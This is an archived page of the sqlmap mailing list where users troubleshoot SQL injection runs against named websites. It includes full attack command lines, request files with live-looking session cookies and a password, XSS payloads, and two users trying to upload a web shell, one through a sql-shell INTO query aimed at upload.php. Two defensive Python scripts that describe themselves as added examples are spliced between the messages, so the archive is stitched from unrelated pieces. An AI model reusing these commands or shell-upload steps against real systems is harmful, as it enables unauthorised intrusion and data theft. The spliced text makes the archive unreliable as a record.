sqlmap-users Mailing List for sqlmap (Page 23)
From: Miroslav S. <mir...@gm...> - 2014-04-29 15:25:40

As the error suggests, no sufficient privileges. Common mitigation.

Bye

On Apr 29, 2014 11:19 AM, "Sabin Ranjit" <thi...@gm...> wrote:

> hi,
> I have sql injection, I can get the current user with the --current-user
> command but when I option for password then sqlmap couldn't do it. it says:
>
> [WARNING] in case of continuous data retrieval problems you are advised to
> try a switch '--no-cast' or switch '--hex'
> [05:13:51] [WARNING] unable to retrieve the number of password hashes for
> user 'busroute'
> [05:13:51] [ERROR] unable to retrieve the password hashes for the database
> users (most probably because the session user has no read privileges over
> the relevant system database table)
> [05:13:51] [WARNING] HTTP error codes detected during run:
> 500 (Internal Server Error) - 3 times
>
> Is this the usual way to mitigate the sqli risk. or this is the sqlmap
> error that needs to be option in.
> the used following command:
> #sqlmap -u http://example.com/br/create?key=1 --dbms="MySQL" --risk=3
> level=3 -p key --current-user --password --technique=B
>
> thanks
>
> kind regards,
From: Travis A. <tra...@gm...> - 2014-04-29 13:32:40

I'm using the conf file to kick everything off. The only thing modified in the conf is the URL and the data sent in the post request.

============================== Conf file ================================

# Target URL.
# Example: http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2
url = http://blah/login

# Parse targets from Burp or WebScarab logs
# Valid: Burp proxy (http://portswigger.net/suite/) requests log file path
# or WebScarab proxy ( http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project)
# 'conversations/' folder path
logFile =

# Scan multiple targets enlisted in a given textual file
bulkFile =

# Load HTTP request from a file
# Example (file content): POST /login.jsp HTTP/1.1\nHost: example.com\nUser-Agent: Mozilla/4.0\n\nuserid=joe&password=guessme
requestFile =

# Rather than providing a target URL, let Google return target
# hosts as result of your Google dork expression. For a list of Google
# dorks see Johnny Long Google Hacking Database at
# http://johnny.ihackstuff.com/ghdb.php.
# Example: +ext:php +inurl:"&id=" +intext:"powered by "
googleDork =

# These options can be used to specify how to connect to the target URL.
[Request]

# Data string to be sent through POST.
data = <?xml version="1.0" encoding="UTF-8"?><ns7:LoginInput sessionDiscriminator="blah" locale="en_US" role="" group="" password="monkey" username="monkey" xmlns:ns6=" http://blah.com/Schemas/Core/2008-03/Session" xmlns:ns2=" http://blah.com/Schemas/Soa/2006-03/Base" xmlns:ns5=" http://blah.com/Schemas/Core/2007-12/Session" xmlns=" http://blah.com/Schemas/Core/2006-03/Session" xmlns:ns8=" http://blah.com/Schemas/Core/2009-04/Session" xmlns:ns3=" http://blah.com/Schemas/Core/2007-01/Session" xmlns:ns7=" http://blah.com/Schemas/Core/2008-06/Session" xmlns:ns4=" http://blah.com/Schemas/Core/2007-06/Session" xmlns:ns10=" http://blah.com/Schemas/Core/2012-02/Session" xmlns:ns9=" http://blah.com/Schemas/Core/2010-04/Session"/>

# Character used for splitting parameter values
paramDel =

================================== Command line output ===================================

[C:\tools\sqlmap-bd16bb7]python sqlmap.py -c sqlmap.conf

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:12:39

[23:12:39] [WARNING] using 'C:\Users\travis\.sqlmap\output' as the output directory
[23:12:39] [INFO] testing connection to the target URL
[23:12:39] [INFO] heuristics detected web page charset 'ascii'
[23:12:39] [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401)
[23:12:39] [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401)
[23:12:39] [WARNING] HTTP error codes detected during run:
401 (Unauthorized) - 1 times

[*] shutting down at 23:12:39

[C:\tools\sqlmap-bd16bb7]

================================= End ===========================================

Let me know if any more information is needed. Thanks for all the help.

On Tue, Apr 29, 2014 at 1:51 AM, Miroslav Stampar <mir...@gm...> wrote:

> Can you please send sqlmap console log and used parameters?
> On Apr 28, 2014 10:42 PM, "Travis Altman" <tra...@gm...> wrote:
>
>> Wants me to provide the right http authentication type but the
>> credentials are in the body of the post request. I'm intentionally
>> providing bad credentials which does result in a "401 Unauthorized", not
>> sure if sqlmap is triggering off of that. Also the body of the request is
>> XML if that makes any difference. Any idea why this might be happening?
From: Sabin R. <thi...@gm...> - 2014-04-29 10:07:07

hi,
I'm getting the error like this when I try to upload a hex in the sql-shell:

[WARNING] execution of custom SQL queries is only available when stacked queries are supported

my command is like this:

sql-shell> select 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 into "/home/public_html/upload.php";

what is issue? please help.

thanks,
regards
From: Sabin R. <thi...@gm...> - 2014-04-29 09:19:25

hi,
I have sql injection, I can get the current user with the --current-user command but when I option for password then sqlmap couldn't do it. it says:

[WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[05:13:51] [WARNING] unable to retrieve the number of password hashes for user 'busroute'
[05:13:51] [ERROR] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system database table)
[05:13:51] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times

Is this the usual way to mitigate the sqli risk. or this is the sqlmap error that needs to be option in.
the used following command:

#sqlmap -u http://example.com/br/create?key=1 --dbms="MySQL" --risk=3 level=3 -p key --current-user --password --technique=B

thanks

kind regards,
From: Miroslav S. <mir...@gm...> - 2014-04-29 05:51:17

Can you please send sqlmap console log and used parameters?

On Apr 28, 2014 10:42 PM, "Travis Altman" <tra...@gm...> wrote:

> Wants me to provide the right http authentication type but the credentials
> are in the body of the post request. I'm intentionally providing bad
> credentials which does result in a "401 Unauthorized", not sure if sqlmap
> is triggering off of that. Also the body of the request is XML if that
> makes any difference. Any idea why this might be happening?
From: Travis A. <tra...@gm...> - 2014-04-28 20:42:07

Wants me to provide the right http authentication type but the credentials are in the body of the post request. I'm intentionally providing bad credentials which does result in a "401 Unauthorized", not sure if sqlmap is triggering off of that. Also the body of the request is XML if that makes any difference. Any idea why this might be happening?
From: Doritos <dor...@ya...> - 2014-04-25 18:54:08

./sqlmap.py --version
sqlmap/1.0-dev-b54651b

[*] shutting down at 15:49:18

I just tested again. My bad. I was using with --threads=10
If I remove the --threads it works fine.
Even with --threads if I use --delay, during the tests it respects the delay.
But to my understanding --threads and --delay are opposite ideas. They should not be used together.

On 25-04-2014 11:24, Miroslav Stampar wrote:

> Hi.
>
> Just tried and it works with the latest revision. Can you please tell me
> which version/revision do you use?
>
> Kind regards,
> Miroslav Stampar
>
> On Thu, Apr 24, 2014 at 4:01 PM, Doritos <dor...@ya...> wrote:
>
> Suggestion: --crawl option to respect the --delay parameter.
>
> The issue right now is: If I use the crawl option to crawl some site,
> sometimes it crawls too fast.
>
> I expected the --delay option to slow down the crawling, but the --delay
> option only applies to the injection test.
>
> Thanks.
>
> --
> Miroslav Stampar
> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2014-04-25 14:24:32

Hi.

Just tried and it works with the latest revision. Can you please tell me which version/revision do you use?

Kind regards,
Miroslav Stampar

On Thu, Apr 24, 2014 at 4:01 PM, Doritos <dor...@ya...> wrote:

> Suggestion: --crawl option to respect the --delay parameter.
>
> The issue right now is: If I use the crawl option to crawl some site,
> sometimes it crawls too fast.
>
> I expected the --delay option to slow down the crawling, but the --delay
> option only applies to the injection test.
>
> Thanks.

--
Miroslav Stampar
http://about.me/stamparm
From: Doritos <dor...@ya...> - 2014-04-24 14:02:35

Suggestion: --crawl option to respect the --delay parameter.

The issue right now is: If I use the crawl option to crawl some site, sometimes it crawls too fast.

I expected the --delay option to slow down the crawling, but the --delay option only applies to the injection test.

Thanks.
From: Miroslav S. <mir...@gm...> - 2014-04-21 19:32:53

Hi.

In the majority of cases the user can't do anything. It's a usual way to mitigate this kind of vulnerabilities (by using low privileged DBMS accounts).

Kind regards,
Miroslav Stampar

On Mon, Apr 21, 2014 at 4:35 PM, MR Mokhtar <ger...@gm...> wrote:

> Hi
> I have sql injection and I can dump all tables and every thing is ok but
> when I try to upload a shell it couldn't !!
> sqlmap says cannot write files due to permissions
> now is there any thing I can do to write files to the server?
> thanks in advance.

--
Miroslav Stampar
http://about.me/stamparm
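The mitigation named in this reply and in the 2014-04-29 reply further up the page (a low-privileged DBMS account) can be checked from the defender's side by auditing `SHOW GRANTS` output for the privileges those two threads ran into: read access to the system schema and the FILE privilege. This is an added example, not code from sqlmap or from the list; the account names, schema name and grant lines are constructed.

```python
import re
from collections import defaultdict

# Constructed sample: one entry per row of `SHOW GRANTS FOR <account>` on MySQL.
# Account names and the application schema are hypothetical.
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO 'busapp'@'10.0.0.%'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `busroute_app`.* TO 'busapp'@'10.0.0.%'",
    "GRANT ALL PRIVILEGES ON *.* TO 'legacy'@'%' WITH GRANT OPTION",
    "GRANT SELECT, FILE ON *.* TO 'report'@'localhost'",
    "GRANT SELECT (`User`, `Host`) ON `mysql`.`user` TO 'monitor'@'localhost'",
]

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+"
    r"(?P<grantee>'[^']*'@'[^']*')(?P<rest>.*)$",
    re.IGNORECASE,
)


def split_privileges(privs):
    """Split 'SELECT (a, b), FILE' into {'SELECT', 'FILE'}.

    Commas inside a column list are not separators, and the column list
    itself is dropped so only the privilege name remains.
    """
    parts = re.split(r",\s*(?![^()]*\))", privs)
    return {re.sub(r"\s*\(.*\)$", "", p.strip()).upper() for p in parts}


def audit_grants(lines):
    """Return {grantee: [issues]} for accounts that exceed least privilege.

    Issues reported:
      all-privileges-global  ALL PRIVILEGES ON *.*
      file-privilege         FILE, needed for LOAD_FILE() and INTO OUTFILE
      global-select          SELECT ON *.*, which includes the system schema
      system-schema-access   any grant on the `mysql` schema (password hashes)
      grant-option           account can hand its privileges to others
    """
    findings = defaultdict(set)
    for line in lines:
        m = GRANT_RE.match(line.strip().rstrip(";"))
        if not m:
            continue  # not a GRANT row
        privs = split_privileges(m.group("privs"))
        scope = m.group("scope")
        grantee = m.group("grantee")
        schema = scope.split(".", 1)[0].strip("`").lower()

        if scope == "*.*":
            if privs & {"ALL", "ALL PRIVILEGES"}:
                findings[grantee].add("all-privileges-global")
            else:
                if "FILE" in privs:
                    findings[grantee].add("file-privilege")
                if "SELECT" in privs:
                    findings[grantee].add("global-select")
        elif schema == "mysql":
            findings[grantee].add("system-schema-access")

        if "WITH GRANT OPTION" in m.group("rest").upper():
            findings[grantee].add("grant-option")
    return {g: sorted(issues) for g, issues in findings.items()}


if __name__ == "__main__":
    for grantee, issues in sorted(audit_grants(SAMPLE_GRANTS).items()):
        print(grantee, "->", ", ".join(issues))
```

An account that only holds data privileges on its own schema, like the constructed `busapp` account, produces no findings; that is the configuration under which the errors quoted in these threads appear.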
From: MR M. <ger...@gm...> - 2014-04-21 14:36:02

Hi
I have sql injection and I can dump all tables and every thing is ok but when I try to upload a shell it couldn't !!
sqlmap says cannot write files due to permissions
now is there any thing I can do to write files to the server?
thanks in advance.
From: Brandon P. <bpe...@gm...> - 2014-04-15 12:20:29

Np, I will dig around see what I can find.

Thanks!

On Tue, Apr 15, 2014 at 6:23 AM, Miroslav Stampar <mir...@gm...> wrote:

> Hi.
>
> This is an old opened Issue (Feature request) [1]. At this moment I can't
> promise you anything other than that I'll have it on my mind ;)
>
> Kind regards,
> Miroslav Stampar
>
> [1] https://github.com/sqlmapproject/sqlmap/issues/431
>
> On Tue, Apr 15, 2014 at 2:53 AM, Brandon Perry <bpe...@gm...> wrote:
>
>> Looking in lib/core/option.py it seems to be parsing the correct header fwiw.
>>
>> On Mon, Apr 14, 2014 at 7:44 PM, Brandon Perry <bpe...@gm...> wrote:
>>
>>> Hey!
>>>
>>> I have a PUT request in a file, passing it to sqlmap with -r, but sqlmap
>>> is POSTing the data, and that verb isn't allowed. :( Currently on latest. I
>>> confirmed this by proxying through burp suite and seeing it was a POST.
>>>
>>> Would it help if I provided the request I am making?
>>>
>>> --
>>> http://volatile-minds.blogspot.com -- blog
>>> http://www.volatileminds.net -- website
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Miroslav S. <mir...@gm...> - 2014-04-15 11:24:06

Hi.

This is an old opened Issue (Feature request) [1]. At this moment I can't promise you anything other than that I'll have it on my mind ;)

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/431

On Tue, Apr 15, 2014 at 2:53 AM, Brandon Perry <bpe...@gm...> wrote:

> Looking in lib/core/option.py it seems to be parsing the correct header fwiw.
>
> On Mon, Apr 14, 2014 at 7:44 PM, Brandon Perry <bpe...@gm...> wrote:
>
>> Hey!
>>
>> I have a PUT request in a file, passing it to sqlmap with -r, but sqlmap
>> is POSTing the data, and that verb isn't allowed. :( Currently on latest. I
>> confirmed this by proxying through burp suite and seeing it was a POST.
>>
>> Would it help if I provided the request I am making?
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website

--
Miroslav Stampar
http://about.me/stamparm
From: Brandon P. <bpe...@gm...> - 2014-04-15 00:53:30

Looking in lib/core/option.py it seems to be parsing the correct header fwiw.

On Mon, Apr 14, 2014 at 7:44 PM, Brandon Perry <bpe...@gm...> wrote:

> Hey!
>
> I have a PUT request in a file, passing it to sqlmap with -r, but sqlmap
> is POSTing the data, and that verb isn't allowed. :( Currently on latest. I
> confirmed this by proxying through burp suite and seeing it was a POST.
>
> Would it help if I provided the request I am making?
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Brandon P. <bpe...@gm...> - 2014-04-15 00:44:43

Hey!

I have a PUT request in a file, passing it to sqlmap with -r, but sqlmap is POSTing the data, and that verb isn't allowed. :( Currently on latest. I confirmed this by proxying through burp suite and seeing it was a POST.

Would it help if I provided the request I am making?

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Sabin R. <thi...@gm...> - 2014-04-08 15:12:09

hi Miroslav,
the work around from Brandon did work. I faced this in the latest kali 1.06 and also in the case of Windows 8.
thanks for your reply. :)

regards,
sabin

On Mon, Apr 7, 2014 at 11:28 PM, Miroslav Stampar <mir...@gm...> wrote:

> Hi.
>
> This seems to be a known issue in Kali's (and similar) pre-installed
> sqlmap package.
>
> If this work around from Brandon doesn't work out for you please copy the
> request.txt to the /tmp directory and checkout/run the latest revision like
> described here:
>
> 1) cd /tmp
> 2) git clone https://github.com/sqlmapproject/sqlmap.git
> 3) cd sqlmap
> 4) python sqlmap.py -r request.txt
>
> Kind regards,
> Miroslav Stampar
>
> On Mon, Apr 7, 2014 at 3:48 PM, Brandon Perry <bpe...@gm...> wrote:
>
>> Specify an absolute path to the request file.
>>
>> On Mon, Apr 7, 2014 at 3:34 AM, Sabin Ranjit <thi...@gm...> wrote:
>>
>>> hello all,
>>> I'm getting this error while running the sqlmap with following request
>>> file. the error displays "parsing HTTP request from
>>> 'payment_form_submit.txt'
>>> [04:22:54] [CRITICAL] the specified HTTP request file does not exist. "
>>>
>>> I have used following syntax to run it
>>> #sqlmap -r 'payment_form_submit.txt' --dbms="MySQL" --level=3 --risk=4
>>> -p cardNumber
>>>
>>> I have attached the request file here with changed hostname. Thank you.
>>>
>>> regards,
>>> sabin
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>
> --
> Miroslav Stampar
> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2014-04-07 17:43:27

Hi.

This seems to be a known issue in Kali's (and similar) pre-installed sqlmap package.

If this work around from Brandon doesn't work out for you please copy the request.txt to the /tmp directory and checkout/run the latest revision like described here:

1) cd /tmp
2) git clone https://github.com/sqlmapproject/sqlmap.git
3) cd sqlmap
4) python sqlmap.py -r request.txt

Kind regards,
Miroslav Stampar

On Mon, Apr 7, 2014 at 3:48 PM, Brandon Perry <bpe...@gm...> wrote:

> Specify an absolute path to the request file.
>
> On Mon, Apr 7, 2014 at 3:34 AM, Sabin Ranjit <thi...@gm...> wrote:
>
>> hello all,
>> I'm getting this error while running the sqlmap with following request
>> file. the error displays "parsing HTTP request from
>> 'payment_form_submit.txt'
>> [04:22:54] [CRITICAL] the specified HTTP request file does not exist. "
>>
>> I have used following syntax to run it
>> #sqlmap -r 'payment_form_submit.txt' --dbms="MySQL" --level=3 --risk=4 -p
>> cardNumber
>>
>> I have attached the request file here with changed hostname. Thank you.
>>
>> regards,
>> sabin
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website

--
Miroslav Stampar
http://about.me/stamparm
From: Brandon P. <bpe...@gm...> - 2014-04-07 13:48:20

Specify an absolute path to the request file.

On Mon, Apr 7, 2014 at 3:34 AM, Sabin Ranjit <thi...@gm...> wrote:

> hello all,
> I'm getting this error while running the sqlmap with following request
> file. the error displays "parsing HTTP request from
> 'payment_form_submit.txt'
> [04:22:54] [CRITICAL] the specified HTTP request file does not exist. "
>
> I have used following syntax to run it
> #sqlmap -r 'payment_form_submit.txt' --dbms="MySQL" --level=3 --risk=4 -p
> cardNumber
>
> I have attached the request file here with changed hostname. Thank you.
>
> regards,
> sabin

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Sabin R. <thi...@gm...> - 2014-04-07 08:34:55

POST /adyen/payment HTTP/1.1
Host: qa.xx.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://qa.xx.xxx.com/site
Content-Length: 287
Cookie: YII_CSRF_TOKEN=40f85a2013fae241b220b696edaaadc1955bb519; PHPSESSID=36m2jph1mdnd49rg7btp7q7uc4; buyer_info=2006
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

YII_CSRF_TOKEN=§40f85a2013fae241b220b696edaaadc1955bb519§&cardNumber=§%22%3E%3Cscript%3Ealert(%22street+number%22)%3B%3C%2Fsctript%3E%3C%22§&exp_year=§2016§&exp_month=§06§&cvc=§737§&cardHolder=§%22%3E%3Cscript%3Ealert(%22name%22)%3B%3C%2Fsctript%3E%3C%22§&email=§dhan%40ogy.com§&amount=§80§
From: Miroslav S. <mir...@gm...> - 2014-04-04 14:18:38

Hi.

Thank you for your report. It should be fixed now.

Bye

On Fri, Apr 4, 2014 at 11:19 AM, Visual Zhang <nt...@gm...> wrote:

> [17:12:55] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry
> your run with the latest development version from the GitHub
> repository. If the exception persists, please send by e-mail to
> 'sql...@li...' or open a new issue at
> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the
> following text and any information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get
> back to you.
> sqlmap version: 1.0-dev
> Python version: 2.7.6
> Operating system: posix
> Command line: ./sqlmap.py -r szqcz.txt -p utype
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
> File "./sqlmap.py", line 95, in main
> start()
> File "/Users/anon/tools/sqlmap/lib/controller/controller.py", line
> 382, in start
> checkStability()
> File "/Users/anon/tools/sqlmap/lib/controller/checks.py", line 918,
> in checkStability
> secondPage, _ = Request.queryPage(content=True, raise404=False)
> File "/Users/anon/tools/sqlmap/lib/request/connect.py", line 891, in
> queryPage
> page, headers, code = Connect.getPage(url=uri, get=get, post=post,
> cookie=cookie, ua=ua, referer=referer, host=host, silent=silent,
> method=method, auxHeaders=auxHeaders, response=response,
> raise404=raise404, ignoreTimeout=timeBasedCompare)
> File "/Users/anon/tools/sqlmap/lib/request/connect.py", line 317, in
> getPage
> headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie,
> HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer})
> File "/Users/anon/tools/sqlmap/lib/request/basic.py", line 106, in
> forgeHeaders
> headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cDel or
> DEFAULT_COOKIE_DELIMITER, cookie.name, cookie.value)
> UnicodeDecodeError: 'ascii' codec can't decode byte 0xf7 in position
> 16: ordinal not in range(128)
>
> content of the txt file
>
> POST /login.do HTTP/1.1
> Content-Length: 164
> Content-Type: application/x-www-form-urlencoded
> Referer: http://szqcz.com:80/
> Cookie: JSESSIONID=6966495B026B8E5F865046C2EA694895
> Host: szqcz.com
> Connection: Keep-alive
> Accept-Encoding: gzip,deflate
> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
> (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
> Accept: */*
>
> err_flag=&event=login&password=g00dPa%24%24w0rD&password1=65&rememberMe=yes&returnurl=&user_code=%e4%bc%9a%e5%91%98%e5%90%8d/%e6%89%8b%e6%9c%ba%e5%8f%b7&utype=1

--
Miroslav Stampar
http://about.me/stamparm
From: Visual Z. <nt...@gm...> - 2014-04-04 09:20:27

[17:12:55] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev
Python version: 2.7.6
Operating system: posix
Command line: ./sqlmap.py -r szqcz.txt -p utype
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "./sqlmap.py", line 95, in main
    start()
  File "/Users/anon/tools/sqlmap/lib/controller/controller.py", line 382, in start
    checkStability()
  File "/Users/anon/tools/sqlmap/lib/controller/checks.py", line 918, in checkStability
    secondPage, _ = Request.queryPage(content=True, raise404=False)
  File "/Users/anon/tools/sqlmap/lib/request/connect.py", line 891, in queryPage
    page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
  File "/Users/anon/tools/sqlmap/lib/request/connect.py", line 317, in getPage
    headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer})
  File "/Users/anon/tools/sqlmap/lib/request/basic.py", line 106, in forgeHeaders
    headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cDel or DEFAULT_COOKIE_DELIMITER, cookie.name, cookie.value)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xf7 in position 16: ordinal not in range(128)

content of the txt file

POST /login.do HTTP/1.1
Content-Length: 164
Content-Type: application/x-www-form-urlencoded
Referer: http://szqcz.com:80/
Cookie: JSESSIONID=6966495B026B8E5F865046C2EA694895
Host: szqcz.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

err_flag=&event=login&password=g00dPa%24%24w0rD&password1=65&rememberMe=yes&returnurl=&user_code=%e4%bc%9a%e5%91%98%e5%90%8d/%e6%89%8b%e6%9c%ba%e5%8f%b7&utype=1
From: Brandon P. <bpe...@gm...> - 2014-03-30 14:26:36
|
My full options list was this to successfully exploit the sqli vectors, for future reference:

./sqlmap.py -r /tmp/req.req --level=5 --risk=3 -o --dbms=mysql --force-ssl --tamper=between --drop-set-cookie --text-only

On Sun, Mar 30, 2014 at 9:24 AM, Miroslav Stampar <mir...@gm...> wrote:

> Always happy when issues are resolved by themselves :)
>
> Bye
>
> On Sun, Mar 30, 2014 at 4:01 PM, Brandon Perry <bpe...@gm...> wrote:
>
>> Oh, it looks like I am an idiot, this was supposed to be over SSL, but I
>> was not passing --force-ssl.
>>
>> Sorry for the spam.
>>
>> On Sun, Mar 30, 2014 at 8:49 AM, Brandon Perry <bpe...@gm...> wrote:
>>
>>> FWIW --parse-errors also doesn't seem to affect the output during a scan
>>> on the URL.
>>>
>>> On Sun, Mar 30, 2014 at 8:33 AM, Brandon Perry <bpe...@gm...> wrote:
>>>
>>>> Hi,
>>>>
>>>> I am playing around with an interesting SQL injection. A GET to a php
>>>> script with two params (date1 and date2) will generate a PNG when
>>>> successful, but will output a textual error message when, say, an
>>>> apostrophe is thrown in one of the dates.
>>>>
>>>> For instance, GET fdsa.php?date1=2014-02-28&date2=2014-03-30 will
>>>> result in a PNG.
>>>>
>>>> GET fdsa.php?date1=2014-02-28&date2=2014-03-30' (note apostrophe in
>>>> last param) will yield:
>>>>
>>>> You have an error in your SQL syntax; check the manual that corresponds
>>>> to your MySQL server version for the right syntax to use near 'admin' AND
>>>> a.sid=i.sid and i.ref IN (SELECT ref from
>>>> Itablet)' at line 4
>>>>
>>>> GET fdsa.php?date1=2014-02-28&date1=2014-03-30'+and+'1'='1 will result
>>>> in a PNG
>>>>
>>>> Since the result of a successful query is a PNG, I only expect to be
>>>> able to use an error-based, or boolean/time-based attacks. However, sqlmap
>>>> doesn't detect that either of the params are injectable (both are).
>>>>
>>>> [06:04:13] [WARNING] GET parameter 'date1' does not appear dynamic
>>>> [06:04:13] [WARNING] heuristic (basic) test shows that GET parameter
>>>> 'date1' might not be injectable
>>>>
>>>> I have tried using --text-only and am not using -o, but to no avail.
>>>> Any thoughts on some tricks I can try to see if sqlmap will be able to
>>>> exploit the injection points?
>>>>
>>>> I can send a traffic file if that helps. Currently on latest.
>>>>
>>>> bperry@ubuntu:~/tools/sqlmap$ git pull
>>>> Already up-to-date.
>>>> bperry@ubuntu:~/tools/sqlmap$
>>>>
>>>> --
>>>> http://volatile-minds.blogspot.com -- blog
>>>> http://www.volatileminds.net -- website
>>>
>>> --
>>> http://volatile-minds.blogspot.com -- blog
>>> http://www.volatileminds.net -- website
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>> ------------------------------------------------------------------------------
>>
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
|
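The three requests described in the quoted report, replayed through a small defender-side log audit. This is an added example, not code from the thread or from sqlmap. It flags the leaked MySQL error by response body and the malformed date values by request, which also catches the injected request that still returns a PNG. The records, the leading "/" in the URIs, the PNG filler bytes and the helper names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
# Signature taken from the MySQL error text quoted in the thread.
DB_ERROR = re.compile(rb"You have an error in your SQL syntax", re.I)
DATE = re.compile(r"[0-9]{4}-[0-9]{2}-[0-9]{2}")
DATE_PARAMS = ("date1", "date2")

# Constructed records (request URI, response body) mirroring the three
# requests in the report; the PNG bodies are magic bytes plus filler.
RECORDS = [
    ("/fdsa.php?date1=2014-02-28&date2=2014-03-30", PNG_MAGIC + b"\x00" * 8),
    ("/fdsa.php?date1=2014-02-28&date2=2014-03-30'",
     b"You have an error in your SQL syntax; check the manual that "
     b"corresponds to your MySQL server version"),
    ("/fdsa.php?date1=2014-02-28&date1=2014-03-30'+and+'1'='1",
     PNG_MAGIC + b"\x00" * 8),
]

def classify_body(body):
    """Return 'png', 'db_error_leak' or 'other' from the body alone."""
    if body.startswith(PNG_MAGIC):
        return "png"
    if DB_ERROR.search(body):
        return "db_error_leak"
    return "other"

def bad_date_params(uri):
    """Names of date parameters whose value is not exactly YYYY-MM-DD."""
    pairs = parse_qsl(urlsplit(uri).query, keep_blank_values=True)
    return sorted({k for k, v in pairs
                   if k in DATE_PARAMS and not DATE.fullmatch(v)})

def audit(records):
    """Return (uri, reasons) for every record that needs a look."""
    findings = []
    for uri, body in records:
        reasons = []
        if classify_body(body) == "db_error_leak":
            reasons.append("db_error_leak")
        bad = bad_date_params(uri)
        if bad:
            reasons.append("bad_date:" + ",".join(bad))
        if reasons:
            findings.append((uri, reasons))
    return findings

if __name__ == "__main__":
    for uri, reasons in audit(RECORDS):
        print(uri, reasons)
```

Both checks only surface the symptom; the fix on the application side is to bind date1 and date2 as query parameters and return a generic error page instead of the database message.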
From: Miroslav S. <mir...@gm...> - 2014-03-30 14:24:20
|
Always happy when issues are resolved by themselves :)

Bye

On Sun, Mar 30, 2014 at 4:01 PM, Brandon Perry <bpe...@gm...> wrote:

> Oh, it looks like I am an idiot, this was supposed to be over SSL, but I
> was not passing --force-ssl.
>
> Sorry for the spam.
>
> On Sun, Mar 30, 2014 at 8:49 AM, Brandon Perry <bpe...@gm...> wrote:
>
>> FWIW --parse-errors also doesn't seem to affect the output during a scan
>> on the URL.
>>
>> On Sun, Mar 30, 2014 at 8:33 AM, Brandon Perry <bpe...@gm...> wrote:
>>
>>> Hi,
>>>
>>> I am playing around with an interesting SQL injection. A GET to a php
>>> script with two params (date1 and date2) will generate a PNG when
>>> successful, but will output a textual error message when, say, an
>>> apostrophe is thrown in one of the dates.
>>>
>>> For instance, GET fdsa.php?date1=2014-02-28&date2=2014-03-30 will result
>>> in a PNG.
>>>
>>> GET fdsa.php?date1=2014-02-28&date2=2014-03-30' (note apostrophe in last
>>> param) will yield:
>>>
>>> You have an error in your SQL syntax; check the manual that corresponds
